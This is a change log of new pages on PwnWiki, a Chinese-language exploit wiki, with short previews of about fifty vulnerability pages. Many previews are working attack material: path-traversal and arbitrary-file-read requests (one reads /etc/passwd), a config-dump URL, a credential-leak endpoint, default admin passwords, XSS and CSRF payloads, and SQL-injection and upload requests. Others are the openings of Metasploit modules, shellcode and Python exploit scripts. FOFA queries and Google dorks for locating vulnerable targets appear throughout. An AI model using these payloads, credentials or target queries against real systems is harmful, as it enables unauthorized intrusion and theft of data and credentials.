New pages
From PwnWiki
(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)
- 12:02, 20 April 2021 CVE-2019-2725 Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 遠程代碼執行漏洞 (hist | edit) [9,569 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/python # Exploit Title: Oracle Weblogic Exploit CVE-2019-2725 # Date: 30/04/2019 # Exploit Author: Avinash Kumar Thapa # Vendor Homepage: https://www...")
- 11:15, 20 April 2021 360 Phone N6 Pro內核漏洞/yue (hist | edit) [1,398 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞原理==")
- 11:11, 20 April 2021 Tasks 9.7.3 本地權限提升漏洞 (hist | edit) [1,446 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Tasks 9.7.3 - Insecure Permissions # Exploit Author: Lyhin's Lab # Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-...")
- 11:09, 20 April 2021 WordPress Photo Gallery 1.5.69 跨站腳本漏洞 (hist | edit) [1,875 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> WordPress Photo Gallery 1.5.69 Cross Site Scripting Vulnerability Researcher Name: ThuraMoeMyint Twitter: https://twitter.com/mgthuramoemyint Vendor Url: https:/...")
- 11:06, 20 April 2021 CVE-2020-5791 Nagios XI 5.7.3 遠程代碼執行漏洞 (hist | edit) [6,512 bytes] Pwnwiki (talk | contribs) (Created page with "==MSFEXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitMo...")
- 10:05, 20 April 2021 飛魚星 企業級智能上網行為管理系統 權限繞過信息洩露漏洞 (hist | edit) [497 bytes] Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="飞鱼星企业级智能上网行为管理系统" </pre> ==漏洞利用== 訪問主頁使用Burp抓包; <pre> http://xxx.xxx.xxx.xxx/home/index.html...")
- 20:00, 18 April 2021 Antiy(安天)高級可持續威脅安全檢測系統越權訪問漏洞 (hist | edit) [295 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 在登錄頁面抓包,其中抓包过程中发现请求的一个身份验证 Url <pre> {"role": "", "login_status": false, "result": "ok"} </pre> 其中 l...")
- 16:59, 18 April 2021 Indexhibit cms v2.1.5 編輯php文件getshell漏洞 (hist | edit) [252 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 當我們登錄進後台後,向/ndxzstudio/?a=system post數據: <pre> upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php...")
- 16:57, 18 April 2021 CVE-2019-16314 indexhibit cms v2.1.5 重裝&Getshell漏洞 (hist | edit) [48 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> /ndxzstudio/install.php?p=2 </pre>")
- 12:16, 17 April 2021 啟明星辰 天清漢馬USG防火牆後台弱口令/任意用戶權限漏洞 (hist | edit) [206 bytes] Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="天清汉马USG防火墙" </pre> ==默認賬號密碼== 賬號:useradmin 密碼:venus.user 到後台後,進入管理員頁面,修改訪問...")
- 10:48, 17 April 2021 微信 (Wechat) 無沙箱調用Chrome內核 RCE漏洞 (hist | edit) [5,679 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== ===core.py=== <pre> # only python3 supported payload = b"notepad.exe" shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,13848596...")
- 21:18, 16 April 2021 飛魚星 家用智能路由 cookie.cgi 權限繞過漏洞 (hist | edit) [211 bytes] Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="飞鱼星家用智能路由" </pre> 訪問 index.html 時會請求 cookie.cgi <pre> http://xxx.xxx.xxx.xxx/index.html </pre> 頁面抓包 Drop掉 cook...")
- 19:46, 16 April 2021 CVE-2020-3452 CISCO ASA任意文件讀取漏洞 (hist | edit) [1,082 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ </pre> <pre> GET /+CSCOT+/translation-table?type=mst&textdo...")
- 17:17, 16 April 2021 CVE-2020-14871 Oracle Solaris SunSSH PAM parse user name() 緩衝區溢出漏洞 (hist | edit) [4,630 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModul...")
- 17:16, 16 April 2021 CVE-2020-8260 Pulse Secure VPN 遠程代碼執行漏洞 (hist | edit) [10,685 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModul...")
- 17:13, 16 April 2021 Squid 4.14/5.0.5 遠程代碼執行漏洞 (hist | edit) [15,837 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> A Double-Free bug was found in Squid versions 4.14 and 5.0.5 when processing the "acl" directive on configuration files, more specifically the first and second a...")
- 17:11, 16 April 2021 CatDV 9.2 - RMI 身份驗證繞過漏洞 (hist | edit) [4,101 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: CatDV 9.2 - RMI Authentication Bypass # Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc. # Vendor Homepage: https://catdv.com/ # S...")
- 16:02, 16 April 2021 GetSimple CMS My SMTP Contact Plugin 1.1.1 CSRF&RCE漏洞 (hist | edit) [9,780 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF to RCE # Exploit Author: Bobby Cooke (boku) # Date: 15/04/2021 # Vendor Homepage: http://get-s...")
- 15:00, 16 April 2021 贊助頁 (hist | edit) [1,654 bytes] Pwnwiki (talk | contribs) (Created page with "==簡介== PwnWiki由PwnWiki Team運行,PwnWiki Team只有兩位成員和三台服務器,我們依靠捐贈保證PwnWiki正常運行。 ==宗旨== PwnWiki以免費、自...")
- 11:30, 16 April 2021 Windows Chrome 遠程代碼執行漏洞 (hist | edit) [5,110 bytes] Pwnwiki (talk | contribs) (Created page with "==影響版本== 小於89.0.4389.114 注意:需要關閉沙箱。 ==EXP== <pre> <script> function gc() { for (var i = 0; i < 0x80000; ++i) { var a =...")
- 11:20, 16 April 2021 Apache Solr SSRF漏洞 (hist | edit) [184 bytes] Pwnwiki (talk | contribs) (Created page with "==影響範圍== Apache Solr < 8.8.2 ==FOFA== <pre> app="APACHE-Solr" </pre> ==EXP== <pre> http://127.0.0.1:8983/solr/db/replication\?command=fetchindex\&masterUrl=http://xx...")
- 21:40, 15 April 2021 Kyan 網絡監控設備 賬號密碼洩露漏洞 (hist | edit) [127 bytes] Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="platform - Login" </pre> ==EXP== <pre> http://xxx.xxx.xxx.xxx/hosts </pre> 成功獲得帳號密碼。")
- 21:38, 15 April 2021 CVE-2019-8451 Jira未授權SSRF漏洞 (hist | edit) [535 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> GET /plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:[email protected] HTTP/1.1 Host: 10.206.1.8:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla...")
- 21:32, 15 April 2021 CVE-2020-15500 Tileserver-gl 3.0.0 XSS漏洞 (hist | edit) [86 bytes] Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> http://example.com/?key="><script>alert(document.domain)</script> </pre>")
- 21:25, 15 April 2021 Heybbs 1.2 SQL注入漏洞 (hist | edit) [1,256 bytes] Pwnwiki (talk | contribs) (Created page with "第一處注入存在於login.php文件的username參數處: <pre> POST /php/login.php HTTP/1.1 Host: www.0-sec.org Content-Length: 98 Cache-Control: max-age=0 Upgrade-Insec...")
- 19:17, 15 April 2021 CVE-2019-19117 PHICOMM K2(PSG1218) V22.5.9.163 遠程代碼執行漏洞 (hist | edit) [263 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> curl -i -s -k -v -X'POST' -e "http://192.168.2.1/cgi-bin/luci/;stok=xxx/xxx/xxx/xxx" -b "sysauth=4a2c4bdba5fb1273ce62759fd42dba42" --data-binary "mode=1&autoUpT...")
- 19:15, 15 April 2021 CVE-2016-6158 華為WS331a產品管理頁面CSRF漏洞 (hist | edit) [563 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== 當管理員登陸後,打開如下poc頁面,WS331a設備將重啟。 <pre> <form action="http://192.168.3.1/api/service/reboot.cgi" method="post"> </form> <script>...")
- 18:24, 15 April 2021 WordPress Plugin - Google Review Slider 6.1 SQL注入漏洞 (hist | edit) [545 bytes] Pwnwiki (talk | contribs) (Created page with "==Google Dork== <pre> inurl:"/wp-content/plugins/wp-google-places-review-slider/" </pre> ==POC== <pre> GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=*...")
- 18:21, 15 April 2021 Gitlist 0.6.0 遠程命令執行漏洞 (hist | edit) [420 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> POST /example/tree/a/search HTTP/1.1 Host: www.0-sec.org:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x6...")
- 18:19, 15 April 2021 天融信數據防洩漏系統越權修改管理員密碼漏洞 (hist | edit) [327 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== 無需登錄權限,由於修改密碼處未校驗原密碼,且/?module=auth_user&action=mod_edit_pwd,接口未授權訪問,造成直接修改任意用戶密 碼,...")
- 18:18, 15 April 2021 安略網絡准入控制系統 任意文件上傳漏洞 (hist | edit) [1,071 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: www.0-sec.org ... ... -----------------------------570xxxxxxxxx6025274xxxxxxxx1 Content-Disposition: form...")
- 18:17, 15 April 2021 泛微雲橋任意文件讀取漏洞 (hist | edit) [224 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt http://www.xxx.com/wxjsapi/saveYZJFile?fileName=test&downloadUr...")
- 18:15, 15 April 2021 深信服 SSL VPN - Pre Auth 修改綁定手機漏洞 (hist | edit) [169 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> https://www.0-sec.org/por/changetelnum.csp?apiversion=1 newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1 </pre>")
- 17:16, 15 April 2021 思福迪堡壘機任意用戶登錄漏洞 (hist | edit) [526 bytes] Pwnwiki (talk | contribs) (Created page with "==影響範圍== LogBase-B798 bh-x64-v7.0.15 ==漏洞利用== 獲取INFO字段,u1參數值爲用戶名 <code>POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1=admin&m1=<...")
- 14:50, 15 April 2021 CVE-2019-7609 kibana 未授權遠程代碼執行漏洞 (hist | edit) [458 bytes] Pwnwiki (talk | contribs) (Created page with "==影響版本== kibana<6.6.0 ==POC== 將POC裡的反鏈IP地址換成自己的,然後在目標機器上的 Timelion 選項下將以下 POC 粘貼進去,點擊 Run 運行...")
- 14:42, 15 April 2021 CVE-2019-17662 ThinVNC 1.0b1 身份驗證繞過漏洞 (hist | edit) [996 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: ThinVNC 1.0b1 - Authentication Bypass # Date: 2019-10-17 # Exploit Author: Nikhith Tumamlapalli # Contributor WarMarX # Vendor Homepage: https:/...")
- 14:39, 15 April 2021 CVE-2020-10977 Gitlab CEEE任意文件讀取&遠程命令執行漏洞 (hist | edit) [142 bytes] Pwnwiki (talk | contribs) (Created page with "==影響版本== GitLab GitLab CE/EE >=8.5 and <=12.9 GitLab GitLab CE >=8.5,<=12.9 ==POC== https://github.com/thewhiteh4t/cve-2020-10977")
- 14:01, 15 April 2021 CVE-2019-19781 Citrix 遠程代碼執行漏洞 (hist | edit) [551 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影響== Citrix 13.x,12.1,12.0,11.1,10.5 ==EXP1== <pre> POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 Host: target-ip Connection: close Accept-Encoding: gzip,...")
- 13:55, 15 April 2021 CVE-2020-8813 Cacti v1.2.8 RCE漏洞 (hist | edit) [4,038 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP1== 需要認證 <pre> #!/usr/bin/python3 # Exploit Title: Cacti v1.2.8 Remote Code Execution # Date: 03/02/2020 # Exploit Author: Askar (@mohammadaskar2) # CVE: CVE-202...")
- 13:47, 15 April 2021 CVE-2019-17624 X Server 本地棧溢出漏洞 (hist | edit) [901 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> #!/usr/bin/python #coding: utf-8 # ************************************************************************ # * Author: Marcelo Vázquez (aka s4v...")
- 13:46, 15 April 2021 Easy Chat Server 3.1 拒絕服務漏洞 (hist | edit) [2,083 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/python #--------------------------------------------------------- # Title: Easy Chat Server Version 3.1 - (DOS) # Date: 2019-05-07 # Author: Miguel Me...")
- 13:42, 15 April 2021 Finecms v5.4 CSRF漏洞 (hist | edit) [764 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞描述== 惡意攻擊者可以精心偽造一個html頁面誘騙已登錄的管理用戶點擊,從而更改管理員賬戶密碼。 ==EXP== <pre> <html> <body>...")
- 13:38, 15 April 2021 Adminer 服務器端請求偽造漏洞 (hist | edit) [10,937 bytes] Pwnwiki (talk | contribs) (Created page with "==漏洞影響== Adminer<=4.3.1 ==POC== <pre> import socket,re,ssl,warnings,subprocess,time from platform import system as system_name from os import system as system_call...")
- 13:35, 15 April 2021 CVE-2019-16759 vBulletin 5.x RCE漏洞 (hist | edit) [1,067 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> #!/usr/bin/python # # vBulletin 5.x 0day pre-auth RCE exploit # # This should work on all versions from 5.0.0 till 5.5.4 # # Google Dorks: # - site:*.vbulletin....")
- 11:22, 15 April 2021 CVE-2021-26929 Webmail Edition 5.2.22 XSS&遠程命令執行漏洞 (hist | edit) [10,531 bytes] Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/python3 # debug nu11secur1ty 2021 import io import os import ssl import sys import json import base64 import string import random import logging impor...")
- 11:21, 15 April 2021 CVE-2019-15949 Nagios XI getprofile.sh 遠程命令執行漏洞 (hist | edit) [11,144 bytes] Pwnwiki (talk | contribs) (Created page with "==MSF== <pre> ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModul...")
- 10:57, 15 April 2021 CVE-2020-11023 jQuery 1.0.3 XSS漏洞 (hist | edit) [74 bytes] Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> <img alt="<x" title="/><img src=x onerror=alert(1)>"> </pre>")
- 10:56, 15 April 2021 CVE-2020-11022 jQuery 1.2 XSS漏洞 (hist | edit) [90 bytes] Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> <option><style></option></select><img src=x onerror=alert(1)></style> </pre>")
- 19:20, 14 April 2021 Coremail 配置信息洩露及接口未授權漏洞 (hist | edit) [67 bytes] Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> mailsms/s?func=ADMIN:appState&dumpConfig=/ </pre>")
- 19:18, 14 April 2021 Coremail任意文件讀取漏洞 (hist | edit) [1,892 bytes] Pwnwiki (talk | contribs) (Created page with "==POC== <pre> POST /js4/s?sid=jAZNlaKzhPcBsFgYIazzsbDOwpsMYtTh&func=mbox:compose&l=compose&action=deliver HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: text...")